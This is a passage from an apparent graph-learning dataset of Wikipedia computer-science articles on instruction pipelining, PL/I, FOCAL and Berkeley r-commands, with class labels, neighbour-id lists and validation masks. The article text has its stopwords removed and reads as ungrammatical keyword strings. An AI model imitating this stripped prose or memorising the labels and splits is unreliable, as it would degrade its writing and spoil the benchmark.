    "text": "Instruction_pipelining:instruction pipelining computer science instruction pipelining technique implementing instruction-level parallelism within single processor pipelining attempts keep every part processor busy instruction dividing incoming instructions series sequential steps eponymous pipeline performed different processor units different parts instructions processed parallel allows faster cpu throughput would otherwise possible given clock rate may increase latency due added overhead pipelining process central processing units cpus driven clock clock pulse need thing rather logic cpu directs successive pulses different places perform useful sequence many reasons entire execution machine instruction happen pipelining effects happen time made dependent steps instruction example one clock pulse latches value register begins calculation take time value stable outputs register calculation complete another example reading instruction memory unit done time instruction writes result memory unit number dependent steps varies machine architecture example pipeline made deeper greater number dependent steps given step implemented simpler circuitry may let processor clock run faster pipelines may called superpipelines processor said fully pipelined fetch instruction every cycle thus instructions conditions require delays inhibit fetching new instructions processor fully pipelined seminal uses pipelining illiac ii project ibm stretch project though simple version used earlier z1 1939 z3 1941 pipelining began earnest late 1970s supercomputers vector processors array processors one early supercomputers cyber series built control data corporation main architect seymour cray later headed cray research cray developed xmp line supercomputers using pipelining multiply add/subtract functions later star technologies added parallelism several pipelined functions working parallel developed roger chen 1984 star technologies added pipelined divide circuit developed james bradley mid-1980s pipelining used many different companies around world pipelining limited supercomputers 1976 amdahl corporation 470 series general purpose mainframe 7-step pipeline patented branch prediction circuit today pipelining innovations implemented instruction unit microprocessors model sequential execution assumes instruction completes next one begins assumption true pipelined processor situation expected result problematic known hazard imagine following two register instructions hypothetical processor processor 5 steps listed initial illustration instruction 1 would fetched time execution would complete instruction 2 would fetched would complete first instruction might deposit incremented number r5 fifth step register write back second instruction might get number r5 copy r6 second step instruction decode register fetch time seems first instruction would incremented value code invokes hazard writing computer programs compiled language might raise concerns compiler could designed generate machine code avoids hazards early dsp risc processors documentation advises programmers avoid dependencies adjacent nearly adjacent instructions called delay slots declares second instruction uses old value rather desired value example processor might counter-intuitively copy unincremented value declares value uses undefined programmer may unrelated work processor meantime ensure correct results programmer may insert nops code partly negating advantages pipelining pipelined processors commonly use three techniques work expected programmer assumes instruction completes next one begins branch normal instruction sequence often involves hazard unless processor give effect branch single time cycle pipeline continue fetching instructions sequentially instructions allowed take effect programmer diverted control another part program conditional branch even problematic processor may may branch depending calculation yet occurred various processors may stall may attempt branch prediction may able begin execute two different program sequences eager execution assuming branch taken discarding work pertains incorrect guess processor implementation branch prediction usually makes correct predictions minimize performance penalty branching however branches predicted poorly may create work processor flushing pipeline incorrect code path begun execution resuming execution correct location programs written pipelined processor deliberately avoid branching minimize possible loss speed example programmer handle usual case sequential execution branch detecting unusual cases using programs gcov analyze code coverage lets programmer measure often particular branches actually executed gain insight optimize code right generic pipeline four stages fetch decode execute write-back top gray box list instructions waiting executed bottom gray box list instructions execution completed middle white box pipeline execution follows pipelined processor may deal hazards stalling creating bubble pipeline resulting one cycles nothing useful happens illustration right cycle 3 processor decode purple instruction perhaps processor determines decoding depends results produced execution green instruction green instruction proceed execute stage write-back stage scheduled purple instruction stalled one cycle fetch stage blue instruction due fetched cycle 3 stalled one cycle red instruction bubble blue ovals illustration processor decode circuitry idle cycle 3 execute circuitry idle cycle 4 write-back circuitry idle cycle 5 bubble moves pipeline cycle 6 normal execution resumes everything one cycle late take 8 cycles cycle 1 8 rather 7 completely execute four instructions shown colors",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      10786,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      2140,
      1122,
      4194,
      3175,
      5223,
      8810,
      4205,
      8301,
      8815,
      630,
      6774,
      8822,
      7802,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      2210,
      6818,
      4773,
      5798,
      6821,
      682,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      2745,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      5871,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      6909,
      7421,
      8447,
      1798,
      5384,
      1801,
      6926,
      6415,
      785,
      1298,
      11539,
      7445,
      4385,
      2339,
      6950,
      2345,
      810,
      9003,
      11050,
      3886,
      309,
      5948,
      4928,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      5457,
      7505,
      9044,
      11604,
      344,
      2394,
      3421,
      8543,
      1376,
      11618,
      6501,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      9599,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      1952,
      10658,
      9126,
      936,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      1480,
      466,
      2008,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      2536,
      7657,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 8502,
    "label": 9,
    "text": "PL/I:pl/i pl/i programming language one pronounced procedural imperative computer programming language developed published ibm designed scientific engineering business system programming used academic commercial industrial organizations since introduced 1960s still used pl/i main domains data processing numerical computation scientific computing system programming supports recursion structured programming linked data structure handling fixed-point floating-point complex character string handling bit string handling language syntax english-like suited describing complex data formats wide set functions available verify manipulate 1950s early 1960s business scientific users programmed different computer hardware using different programming languages business users moving autocoders via comtran cobol scientific users programmed general interpretive programme gip fortran algol george others ibm system/360 announced 1964 delivered 1966 designed common machine architecture groups users superseding existing ibm architectures similarly ibm wanted single programming language users hoped fortran could extended include features needed commercial programmers october 1963 committee formed composed originally three ibmers new york three members share ibm scientific users group propose extensions fortran given constraints fortran unable embarked design new programming language based loosely algol labeled npl acronym conflicted uk national physical laboratory replaced briefly mppl multipurpose programming language 1965 pl/i roman numeral first definition appeared april 1964 ibm took npl starting point completed design level first compiler could written npl definition incomplete scope detail control pl/i language vested initially new york programming center later ibm uk laboratory hursley share guide user groups involved extending language role ibm process controlling language pl/i projects experience defining large language showed need formal definition pl/i project set 1967 ibm laboratory vienna make unambiguous complete specification led turn one first large scale formal methods development vdm fred brooks credited ensuring pl/i character data type language first specified detail manual pl/i language specifications c28-6571 written new york 1965 superseded pl/i language specifications gy33-6003 written hursley 1967 ibm continued develop pl/i late sixties early seventies publishing gy33-6003 manual manuals used multics group early implementers first compiler delivered 1966 standard pl/i approved 1976 goals pl/i evolved early development language competitiveness cobol record handling report writing required language scope usefulness grew include system programming event-driven programming additional goals pl/i achieve goals pl/i borrowed ideas contemporary languages adding substantial new capabilities casting distinctive concise readable syntax many principles capabilities combined give language character important meeting language goals language designed things programmers summary extracted ansi pl/i standard ansi pl/i general-purpose subset standard pl/i program consists set procedures written sequence statements codice_5 construct used include text sources program translation statement types summarized groupings give overview language standard uses organization names may declared represent data following types either single values aggregates form arrays lower-bound upper-bound per dimension structures comprising nested structure array scalar variables codice_6 type comprises attributes base scale precision scale factor codice_7 type encoded within codice_8 mode specified separately codice_9 applied real imaginary parts values computed expressions written using specific set operations builtin functions may applied aggregates well single values together user-defined procedures likewise may operate return aggregate well single values assignment statement assigns values one variables reserved words pl/i statement terminated semi-colon maximum length statement implementation defined comment may appear anywhere program space permitted preceded characters forward slash asterisk terminated characters asterisk forward slash i.e statements may label-prefix introducing entry name codice_10 codice_11 statements label name condition prefix enabling disabling computational condition e.g codice_12 entry label names may single identifiers identifiers followed subscript list constants codice_13 sequence statements becomes group preceded codice_4 statement followed codice_15 statement groups may include nested groups begin blocks codice_16 statement specifies group single statement codice_17 part codice_18 part see sample program group unit iteration begin block codice_19 may contain declarations names internal procedures local block procedure starts codice_11 statement terminated syntactically codice_15 statement body procedure sequence blocks groups statements contains declarations names procedures local procedure codice_22 procedure on-unit single statement block statements written executed one conditions occur computational condition input/output condition one conditions declaration identifier may contain one following attributes need mutually consistent current compilers kednos micro focus particularly ibm implement many extensions standardized version language ibm extensions summarised implementation sub-section compiler later although extensions common compilers lack current standard means compatibility guaranteed language standardization began april 1966 europe ecma tc10 1969 ansi established composite language development committee nicknamed kludge later renamed x3j1 pl/i standardization became joint effort ecma tc/10 ansi x3j1 subset gy33-6003 document offered joint effort ibm became base document standardization major features omitted base document multitasking attributes program optimization e.g codice_27 codice_28 proposals change base document voted upon committees event committees disagreed chairs initially michael marcotty general motors c.a.r hoare representing icl resolve disagreement addition ibm honeywell cdc data general digital equipment prime computer burroughs rca univac served x3j1 along major users eastman kodak mitre union carbide bell laboratories various government university representatives development language occurred standards bodies continuing improvements structured programming internal consistency omission obscure contentious features language development neared end x3j1/tc10 realized number problems document written english text discussion single item might appear multiple places might might agree difficult determine omissions well inconsistencies consequently david beech ibm robert freiburghouse honeywell milton barber cdc m. donald maclaren argonne national laboratory craig franklin data general lois frampton digital equipment editor d.j andrews ibm undertook rewrite entire document producing one complete chapters standard couched formal definition using pl/i machine specify semantics first possibly programming language standard written semi-formal definition pl/i general-purpose subset subset-g standard issued ansi 1981 revision published 1987 general purpose subset widely adopted kernel pl/i implementations pl/i first implemented ibm hursley laboratories united kingdom part development system/360 first production pl/i compiler pl/i f compiler os/360 operating system built john nash team hursley uk runtime library team managed i.m nobby clarke pl/i f compiler written entirely system/360 assembly language release 1 shipped 1966 os/360 real-memory environment compiler designed systems little 64 kilobytes real storage – f 64 kb s/360 parlance fit large compiler 44 kilobytes memory available 64-kilobyte machine compiler consists control phase large number compiler phases approaching 100 phases brought memory disk one time handle particular language features aspects compilation phase makes single pass partially-compiled program usually held memory aspects language still designed pl/i f implemented omitted later releases pl/i record i/o shipped pl/i f release 2 list processing functions based variables pointers areas offsets locate-mode i/o first shipped release 4 major attempt speed pl/i code compete fortran object code pl/i f release 5 substantial program optimization do-loops facilitated reorder option procedures version pl/i f released tss/360 timesharing operating system system/360 model 67 adapted ibm mohansic lab ibm la gaude lab france developed language conversion programs convert fortran cobol algol programs pl/i f level pl/i pl/i compiler using 16 kilobytes memory developed ibm germany dos/360 low end operating system implements subset pl/i language requiring strings arrays fixed extents thus simplifying run-time environment reflecting underlying operating system lacks dynamic storage allocation controlled storage class shipped within year pl/i f. compilers implemented several groups early 1960s multics project mit one first develop operating system high-level language used early pl/i epl subset dialect pl/i implementation language 1964 epl developed bell labs mit douglas mcilroy robert morris others influential multics pl/i compiler source compiler technology used number manufacturers software groups honeywell pl/i compiler series 60 implementation full ansi x3j1 standard pl/i optimizer checkout compilers produced hursley support common level pl/i language aimed replace pl/i f compiler checkout compiler rewrite pl/i f bsl ibm pl/i-like proprietary implementation language later pl/s performance objectives set compilers shown ibm presentation bcs compilers produce identical results checkout compiler used debug programs would submitted optimizer given compilers entirely different designs handling full pl/i language goal challenging achieved pl/i optimizing compiler took pl/i f compiler ibm workhorse compiler 1970s 1990s like pl/i f multiple pass compiler 44 kilobyte design point entirely new design unlike f compiler perform compile time evaluation constant expressions using run-time library reducing maximum memory compiler phase 28 kilobytes second-time around design succeeded eliminating annoyances pl/i f cascading diagnostics written s/360 macro assembler team led tony burbridge worked pl/i f. macros defined automate common compiler services shield compiler writers task managing real-mode storage allowing compiler moved easily memory models gamut program optimization techniques developed contemporary ibm fortran h compiler deployed optimizer equaled fortran execution speeds hands good programmers announced ibm s/370 1970 shipped first dos/360 operating system august 1971 shortly afterward os/360 first virtual memory ibm operating systems os/vs1 mvs vm/cms developers unaware shoehorning code 28 kb sections ibm poughkeepsie finally ready ship virtual memory support os/360 supported batch programming environments tso cms could run interactively compiler went many versions covering mainframe operating systems including operating systems japanese plug-compatible machines pcms compiler superseded ibm pl/i os/2 aix linux z/os pl/i checkout compiler colloquially checker announced august 1970 designed speed improve debugging pl/i programs team led brian marks three-pass design cut time compile program 25 taken f compiler run interactive terminal converting pl/i programs internal format h-text format interpreted checkout compiler run-time detecting virtually types errors pointers represented 16 bytes containing target address description referenced item thus permitting bad pointer use diagnosed conversational environment error detected control passed user inspect variables introduce debugging statements edit source program time debugging capability mainframe programming environments developed functions offered compiler withdrawn 1990s perhaps commercially successful implementation aside ibm digital equipment 1988 release ansi pl/i 1987 subset implementation strict superset ansi x3.4-1981 pl/i general purpose subset provides features new ansi x3.74-1987 pl/i general purpose subset front end designed robert freiburghouse code generator implemented dave cutler managed design implementation vax/vms runs vms vax alpha tru64 uniprise systems inc. responsible compiler late 1960s early 1970s many us canadian universities establishing time-sharing services campus needed conversational compiler/interpreters use teaching science mathematics engineering computer science dartmouth developing basic pl/i popular choice concise easy teach ibm offerings unsuitable number schools built subsets pl/i interactive support examples compiler developed cornell university teaching dialect called pl/c unusual capability never failing compile program use extensive automatic correction many syntax errors converting remaining syntax errors output statements language almost pl/i implemented ibm pl/c fast compiler plago created polytechnic institute brooklyn used simplified subset pl/i language focused good diagnostic error messages fast compilation times computer systems research group university toronto produced sp/k compilers supported sequence subsets pl/i called sp/1 sp/2 sp/3 ... sp/8 teaching programming programs ran without errors sp/k compilers produced results contemporary pl/i compilers ibm pl/i f compiler ibm checkout compiler cornell university pl/c compiler examples pl0 p. grouse university new south wales plum marvin zelkowitz university maryland. pluto university toronto major revamp pl/i ibm santa teresa california launched entirely new compiler 1992 initial shipment os/2 included ansi-g features many new pl/i features subsequent releases covered additional platforms mvs vm os/390 aix windows -although support windows since withdrawn continued add functions make pl/i fully competitive languages offered pc particularly c c++ areas overtaken corresponding ibm language environment supports inter-operation pl/i programs database transaction systems programs written c c++ cobol compiler supports data types needed intercommunication languages pl/i design principles retained withstood major extension comprising several new data types new statements statement options new exception conditions new organisations program source resulting language compatible super-set pl/i standard earlier ibm compilers major topics added pl/i latest series pl/i compilers z/os called enterprise pl/i z/os leverage code generation latest z/architecture processors z14 z13 zec12 zbc12 z196 z114 via use archlvl parm control passed compilation second high level language supported z/os language environment xl c/c++ first enterprise cobol v5 last codice_30 new computational data type ordinal facilities like pascal e.g codice_39 addition name internal values accessible via built-in functions built-in functions provide access ordinal value predecessor successor codice_40 see allows additional codice_33s declared composed pl/i built-in attributes codice_42 locator data type similar codice_43 data type strongly typed bind particular data structure codice_44 operator used select data structure using handle codice_34 attribute equivalent codice_46 early pl/i specifications permits several scalar variables arrays structures share storage unit occupies amount storage needed largest alternative attributes added new string-handling functions added centre text edit using picture format trim blanks selected characters head tail text codice_63 codice_64 right codice_65 codice_66 functions compound assignment operators la c e.g codice_67 codice_68 codice_69 codice_70 added codice_71 equivalent codice_72 additional parameter descriptors attributes added omitted arguments variable length argument lists codice_73 attribute declares identifier constant derived specific literal value restricted expression parameters codice_74 pass address codice_37 pass value attributes codice_76 codice_77 attributes prevent unintended assignments codice_78 obviates need contrived construct codice_79 codice_40 introduces user-specified names e.g codice_81 combinations built-in attributes e.g codice_82 thus codice_83 creates codice_33 name codice_81 alias set built-in attributes fixed binary 31.0 codice_31 applies structures members provides codice_33 name set structure attributes corresponding substructure member declarations use structure declaration generalisation codice_88 attribute codice_89 statement exit loop codice_90 continue next iteration loop codice_56 codice_57 options iterative groups package construct consisting set procedures declarations use unit variables declared outside procedures local package use codice_93 codice_94 codice_95 storage procedure names used package also local made external means codice_96 option codice_97 codice_98 executed on-unit terminates execution on-unit raises condition procedure called current one thus passing control corresponding on-unit procedure codice_99 condition handles invalid operation codes detected pc processor well illegal arithmetic operations subtraction two infinite values codice_100 condition provided intercept conditions specific on-unit provided current procedure codice_101 condition raised codice_102 statement unable obtain sufficient storage number vendors produced compilers compete ibm pl/i f optimizing compiler mainframes minicomputers 1970s 1980s target usually emerging ansi-g subset pl/i implementations developed mainframes late 1960s mini computers 1970s personal computers 1980s 1990s although main use mainframes pl/i versions dos microsoft windows os/2 aix openvms unix widely used business data processing system use writing operating systems certain platforms complex powerful systems built pl/i sas system initially written pl/i sas data step still modeled pl/i syntax pioneering online airline reservation system sabre originally written ibm 7090 assembler s/360 version largely written using sabretalk purpose built subset pl/i compiler dedicated control program pl/i used write executable formal definition interpret ibm system network architecture pl/i fulfill supporters hopes would displace fortran cobol become major player mainframes remained minority significant player definitive explanation trends 1970s 1980s militated success progressively reducing territory pl/i enjoyed competitive advantage first nature mainframe software environment changed application subsystems database transaction processing cics ims oracle system 370 application generators became focus mainframe users application development significant parts language became irrelevant need use corresponding native features subsystems tasking much input/output fortran used application areas confining pl/i cobol territory users stayed cobol pc became dominant environment program development fortran cobol pl/i became minority languages overtaken c++ java like second pl/i overtaken system programming field ibm system programming community ready use pl/i instead ibm developed adopted proprietary dialect pl/i system programming – pl/s success pl/s inside ibm c outside ibm unique pl/i strengths system programming became less valuable third development environments grew capabilities interactive software development made unique pl/i interactive debugging strengths less valuable fourth cobol fortran added features structured programming character string operations object orientation reduced pl/i relative advantages mainframes substantial business issues stake ibm hardware competitors little gain much lose success pl/i compiler development expensive ibm compiler groups in-built competitive advantage many ibm users wished avoid locked proprietary solutions early support pl/i vendors best avoid pl/i article uses pl/i standard reference point language features number features significance early implementations standard offered non-ibm compilers de facto language continued grow standard ultimately driven developments personal computer multi tasking implemented pl/i f optimizer newer aix z/os compilers comprised data types codice_104 codice_105 codice_106 codice_107 fork codice_108 join codice_109 codice_110s record i/o statements codice_111 statement unlock locked records codice_112 files event data identify particular event indicate whether complete 1 b incomplete 0 b task data items identify particular task process indicate priority relative tasks first ibm compile time preprocessor built ibm boston advanced programming center located cambridge mass shipped pl/i f compiler codice_5 statement standard rest features dec kednos pl/i compilers implemented much set features ibm additions ibm continued add preprocessor features compilers preprocessor treats written source program sequence tokens copying output source file acting token encountered following compile time statement executed identifier token encountered identifier codice_114d codice_115d assigned compile time value identifier replaced value tokens added output stream require action e.g codice_116 values activated compile time expressions thus compile time variable codice_117 could declared activated assigned using codice_118 subsequent occurrences codice_117 would replaced codice_120 data type supported codice_121 integers codice_122 strings varying length maximum length structure statements simple statements also may label-list feature allowed programmers use identifiers constants e.g product part numbers mathematical constants superseded standard named constants computational data conditional compiling iterative generation source code possible compile-time facilities supported standard several manufacturers implemented facilities structured programming additions made pl/i standardization accepted standard features codice_133 exit iterative codice_4 codice_135 codice_136 added codice_4 case statement general form codice_138 br features included dec pl/i pl/i f offered debug facilities put forward standard implemented others notably check variable-list condition prefix codice_139 on-condition codice_140 option ibm optimizing checkout compilers added additional features appropriate conversational mainframe programming environment e.g codice_141 condition several attempts made design structure member type could one several datatypes codice_46 early ibm growth classes programming theory approaches became possible pl/i base codice_34 codice_33 etc added several compilers pl/i conceived single-byte character world support japanese chinese language becoming essential developments international code pages character string concept expanded accommodate wide non-ascii/ebcdic strings time date handling overhauled deal millennium problem introduction datetime function returned date time one 35 different formats several date functions deal conversions days seconds though language easy learn use implementing pl/i compiler difficult time-consuming language large pl/i needed subsets vendors could produce users master resolved ansi g published compile time facilities unique pl/i took added implementation effort additional compiler passes pl/i compiler two four times large comparable fortran cobol compilers also much slower—supposedly offset gains programmer productivity anticipated ibm first compilers written argue pl/i unusually hard parse pl/i keywords reserved programmers use variable procedure names programs original pl/i f compiler attempts auto-correction encounters keyword used incorrect context often assumes variable name leads cascading diagnostics problem solved later compilers effort needed produce good object code perhaps underestimated initial design language program optimization needed compete excellent program optimization carried available fortran compilers unusually complex owing side effects pervasive problems aliasing variables unpredictable modification occur asynchronously exception handlers may provided statements unseen callers together make difficult reliably predict program variables might modified runtime typical use however user-written error handlers codice_145 often make assignments variables spite aforementioned difficulties ibm produced pl/i optimising compiler 1971 pl/i contains many rarely-used features multitasking support ibm extension language add cost complexity compiler co-processing facilities require multi-programming environment support non-blocking multiple threads processes operating system compiler writers free select whether implement features undeclared variable default declared first occurrence—thus misspelling might lead unpredictable results implicit declaration different fortran programs pl/i f however attribute listing enables programmer detect misspelled undeclared variable many programmers slow move cobol fortran due perceived complexity language immaturity pl/i f compiler programmers sharply divided scientific programmers used fortran business programmers used cobol significant tension even dislike groups pl/i syntax borrowed cobol fortran syntax instead noticing features would make job easier fortran programmers time noticed cobol syntax opinion business language cobol programmers noticed fortran syntax looked upon scientific language cobol fortran programmers viewed bigger version language somewhat intimidated language disinclined adopt another factor pseudo -similarities cobol fortran algol pl/i elements looked similar one languages worked differently pl/i frustrations left many experienced programmers jaundiced view pl/i often active dislike language early unix fortune file contained following tongue-in-cheek description language speaking someone delved intricacies pl/i sure real men could written machine-hogging cycle-grabbing all-encompassing monster allocate array free middle third sure multiply character string times bit string assign result float decimal go ahead free controlled variable procedure parameter reallocate passing back overlay three different types variable memory location anything say write recursive macro well real men use rescan could language obviously designed written real men intended real man use positive side full support pointers data types including pointers structures recursion multitasking string handling extensive built-in functions pl/i indeed quite leap forward compared programming languages time however enough persuade majority programmers shops switch pl/i pl/i f compiler compile time preprocessor unusual outside lisp world using target language syntax semantics e.g compared c preprocessor directives pl/i provides several 'storage classes indicate lifetime variables storage managed codice_146 codice_94 simplest implement codice_93 indicates memory allocated initialized load-time done cobol working-storage early fortran default codice_22 variables pl/i default storage class codice_150 variables codice_151 similar block-structured languages influenced algol like auto storage class c language default storage allocation pascal local-storage ibm cobol storage codice_151 variables allocated upon entry codice_153 procedure on-unit declared compiler runtime system allocate memory stack frame contain housekeeping information variable declared codice_154 code set initial value executed time care required manage use initialization properly large amounts code executed initialize variables every time scope entered especially variable array structure storage codice_151 variables freed block exit codice_156 codice_94 variables used retain variables contents invocations procedure block codice_95 storage also managed using stack pushing popping allocations stack managed programmer using codice_102 codice_160 statements storage codice_94 variables managed using codice_162 instead stack allocations independent lifetimes addressed codice_163 codice_43 variables codice_23 attribute used declare programmer-defined heaps data allocated freed within specific area area deleted read written unit several ways accessing allocated storage different data declarations well defined safe used safely careful programming inherently unsafe and/or machine dependent passing variable argument parameter reference allows argument allocated storage referenced using parameter codice_166 attribute e.g codice_167 allows part variable storage used different consistent declaration language definition includes codice_46 attribute later renamed codice_34 allow different definitions data share storage supported many early ibm compilers usages safe machine independent record i/o list processing produce situations programmer needs fit declaration storage next record item knowing type data structure based variables pointers key programs data structures must designed appropriately typically using fields data structure encode information type size fields held preceding structure constraints current one encoding preceding structure program needs allocate based variable declaration matches current item using expressions extents needed type size information kept current structure self defining structures type-defining fields must ahead type dependent items place every version data structure codice_103-option used self-defining extents e.g string lengths codice_171 codice_172 used allocate instances data structure self-defining structures typing codice_173 fields placed ahead real data records data set items list data structures organised way handled safely machine independent way pl/i implementations except pl/i checkout compiler keep track data structure used storage first allocated codice_94 declaration used pointer storage access storage inherently unsafe machine dependent however usage become important pointer arithmetic typically adding certain amount known address contentious subject computer science addition problem wild references buffer overruns issues arise due alignment length data types used particular machines compilers many cases pointer arithmetic might needed involve finding pointer element inside larger data structure codice_175 function computes pointers safely machine independently pointer arithmetic may accomplished aliasing binary variable pointer codice_176 relies pointers length codice_177 integers aligned boundaries prevalence c free easy attitude pointer arithmetic recent ibm pl/i compilers allow pointers used addition subtraction operators giving simplest syntax compiler options disallow practices safety machine independence paramount pl/i designed programs ran batch mode possible intervention programmer terminal exceptional condition division zero would abort program yielding hexadecimal core dump pl/i exception handling via on-units allowed program stay control face hardware operating system exceptions recover debugging information closing gracefully program became properly debugged exception handling could removed disabled level control became less important conversational execution became commonplace computational exception handling enabled disabled condition prefixes statements blocks including on-units procedures – e.g codice_178 operating system exceptions input/output storage management always enabled on-unit single statement codice_179-block introduced codice_180 executing statement enables condition specified e.g. codice_181 exception condition occurs condition enabled on-unit condition executed on-units inherited call chain block procedure on-unit activated on-units established invoking activation inherited new activation may over-ridden another codice_180 reestablished codice_183 exception simulated using codice_184 – e.g help debug exception handlers dynamic inheritance principle on-units allows routine handle exceptions occurring within subroutines uses on-unit effect condition raised standard system action taken often raise codice_25 condition system action reestablished using codice_186 option codice_180 conditions possible complete executing on-unit return point interrupt e.g. codice_188 conditions resume normal execution conditions codice_189 codice_25 condition raised attempted on-unit may terminated codice_191 preventing return point interrupt permitting program continue execution elsewhere determined programmer on-unit needs designed deal exceptions occur on-unit codice_192 statement allows nested error trap error occurs within on-unit control might pass operating system system dump might produced computational conditions continue execution mentioned pl/i codice_193 i/o statements relatively simple syntax offer options many situations end-of-file record transmission errors occur record read written instead complexities handled on-units various file conditions approach adopted codice_23 sub-allocation codice_23 condition existence exception handling on-units effect optimization variables inspected altered on-units values variables might otherwise kept registers statements may need returned storage statements discussed section implementation issues",
    "neighbors": [
      512,
      7173,
      3594,
      6160,
      9751,
      5658,
      3613,
      10280,
      5677,
      7217,
      7733,
      3642,
      3142,
      8262,
      9298,
      2138,
      2652,
      96,
      6242,
      10340,
      9829,
      6248,
      107,
      6772,
      2168,
      2172,
      9345,
      1673,
      6797,
      5277,
      4255,
      3238,
      10415,
      6846,
      1219,
      6342,
      10438,
      721,
      10469,
      6378,
      8188,
      5361,
      9977,
      3323,
      7939,
      5896,
      10508,
      8973,
      11024,
      5911,
      2345,
      7983,
      4913,
      5428,
      310,
      823,
      8502,
      4409,
      10040,
      10043,
      8509,
      10560,
      4930,
      837,
      4423,
      10571,
      8524,
      11596,
      11604,
      2901,
      10585,
      9050,
      8543,
      868,
      6503,
      5492,
      3960,
      4998,
      4492,
      909,
      7053,
      7055,
      10641,
      11673,
      8606,
      7071,
      1952,
      421,
      6056,
      9139,
      5557,
      5046,
      7607,
      955,
      443,
      963,
      4548,
      5584,
      5074,
      11219,
      5588,
      6102,
      4057,
      477,
      10720,
      5612,
      1016,
      2556,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8503,
    "label": 9,
    "text": "FOCAL_(programming_language):focal programming language focal interpreted programming language resembling joss name acronym formulating on-line calculations algebraic language largely creation richard merrill focal initially written largest impact pdp-8 computers made digital equipment corporation dec merrill wrote original 1968 classic focal-69 interpreters pdp-8 dec described focal joss-like language like early versions basic focal complete programming environment requiring operating system mumps commands could practice abbreviated single letter alphabet creative choices words used make command uniquely defined leading character digital made available several european-language versions command words translated target language focal ran low-end pdp-8 systems even systems 4k words 6k bytes memory lacking mass storage focal interpreter written assembly language typically used 3k 12-bit words leaving somewhat limiting 1k words hold user program variables system upgraded adding one extra 4k banks memory focal could use extra memory either single user split extra memory across several time-sharing users focal made extensive use interrupt-driven terminal i/o could keep four teleprinters busy without pause memory space precious storing textual error messages focal used clever workaround error messages instead displayed start address error-managing routine floating-point number example focal-69 implementation division zero error managed code starting memory address octal 4333 division zero program line numbered codice_1 produced error message codice_2 codice_3 represents memory page 28 plus offset 73 words focal sites error number error message list posted near terminals comparisons focal basic inevitable since languages common minicomputers era focal lacked inherent support strings data elements could assigned variables generally thought serious deficiency compared string capabilities basics deficiency serious utterly crippling might sound surprising amount string usage focal programs devoted formatting user output since focal output character-stream-oriented outputting two strings sequentially could sometimes substitute concatenating procedural tools could written performing complex formatted output limited amount string input could done program could ask simple yes/no questions really kludge example one typed hello input statement focal would convert h 8 interpret e starting exponent would try compute 8 llo power would take several seconds cpu time result value 0.76593020e+103 particularly helpful response generally agreed focal efficient use resources comparable basic systems typical machine day often 6 24 kilobytes magnetic-core memory focal could handle larger complex programming tasks basic focal pdp-8 implementation used floating point representation represented numbers four 12-bit words thirty-six bits mantissa twelve bits exponent allowed significantly higher precision significantly wider range values low-end programming systems made reasonable choice serious numerical work high precision good choices default decimal output formatting meant difficulties binary-to-decimal rounding evident beginning users coca-cola corporation used customized version focal called coke focal later implemented pdp-7 pdp-9 pdp-10 pdp-11 pdp-12 pdp-5 linc-8 focal manual showed add commands focal parser many sites added specialized commands operating custom hardware digital equipment computer users society collected many patches enhancements focal even major enhanced offshoots focal focal-w added many features including better mass storage file i/o even virtual variable memory russia saw use late early 1990s mass-produced home computers electronika bk series focal15 v6b program takes year birth calculates year a.f focal born program lines focal program grouped line groups line numbers within group first line program line 01.10 line 10 group 01 line numbers targets goto statements ask statement prompts attached teleprinter input type statement outputs text teleprinter multiple items output teleprinter appending item comma exclamation mark causes linefeed carriage return sent set statement assigns value variable value result expression conditional statement receive three line numbers parameters arithmetic program branches first linenumber result expression parentheses less zero second result zero third result zero go command focal begins run program focal prompts single asterisk beginning line expecting input",
    "neighbors": [
      3650,
      7076,
      1061,
      8262,
      10475,
      1804,
      8910,
      7983,
      6448,
      9714,
      11635,
      1716,
      8732
    ],
    "mask": "None"
  },
  {
    "node_id": 8504,
    "label": 5,
    "text": "Berkeley_r-commands:berkeley r-commands berkeley r-commands suite computer programs designed enable users one unix system log issue commands another unix computer via tcp/ip computer network r-commands developed 1982 computer systems research group university california berkeley based early implementation tcp/ip protocol stack internet csrg incorporated r-commands unix operating system berkeley software distribution bsd r-commands premiered bsd v4.1 among programs suite remote copy remote execution remote login remote shell remote r-commands significant innovation became de facto standards unix operating systems wider public adoption internet inherent security vulnerabilities became problem beginning development secure shell protocols applications 1995 adoption entirely supplanted deployment use r-commands telnet networked systems original berkeley package provides rlogin also features rcp remote-copy allowing files copied network rsh remote-shell allowing commands run remote machine without user logging share hosts.equiv .rhosts access-control scheme although connect different daemon rshd enables user log another server via computer network using tcp network port 513. rlogin also name application layer protocol used software part tcp/ip protocol suite authenticated users act physically present computer rfc 1282 defined states rlogin facility provides remote-echoed locally flow-controlled virtual terminal proper flushing output rlogin communicates daemon rlogind remote host rlogin similar telnet command customizable able connect unix-like hosts rsh opens shell remote computer without login procedure connected user execute commands remote computer shell command-line interface rsh passes input output standard streams sends standard output user console network standard input standard flow tcp port 514 standard error flows different tcp port rsh daemon rshd opens like rsh rexec enables user run shell commands remote computer however unlike rsh server rexec server rexecd requires login authenticates users reading username password unencrypted network socket rexec uses tcp port 512. rcp copy file directory local system remote system remote system local system one remote system another command line arguments cp rcp similar rcp remote files prefixed name remote system unix copy command cp rcp overwrites existing file name target unlike cp provides mechanism warning user overwriting target file like rsh rcp uses tcp port 514 command lists users logged local unix system rwho lists users logged multi-user unix systems local network rwho daemon rwhod maintains database status unix systems local network daemon database also used ruptime program command shows long unix system running since last restart requests status report computers local network returns uptime report computer respond within time limit ruptime reports system information tracked stored daemon rwhod also used rwho command r-commands involve user authentication rcp rexec rlogin rsh share several serious security vulnerabilities due problems r-commands fell relative disuse many unix 